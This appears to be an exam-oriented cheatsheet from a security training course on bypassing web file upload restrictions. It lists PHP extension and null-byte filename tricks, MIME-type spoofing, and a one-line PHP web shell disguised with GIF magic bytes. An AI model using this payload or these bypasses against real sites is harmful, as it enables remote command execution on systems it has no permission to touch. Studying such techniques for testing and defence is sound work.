File Upload Attacks
Web
Overview
Bypassing file upload restrictions.
1
Exercises
1
Flashcards
1
Mind Maps
Cheatsheet
Extension Bypass
.php5, .phtml, .phar # Alternative PHP extensions .php.jpg, .php%00.jpg # Double extension and null byte bypass
Content-Type
Content-Type: image/jpeg # Spoof MIME type
Magic Bytes
GIF89a; <?php system($_GET['cmd']); ?> # Add GIF magic bytes to bypass file check
Execution
- Find upload path
- Navigate and execute
Command Examples
Common Pitfalls
- Not finding upload location
- Uploads renamed/not executable
Exam Survival Tips
- Try all bypass methods
- Check .htaccess override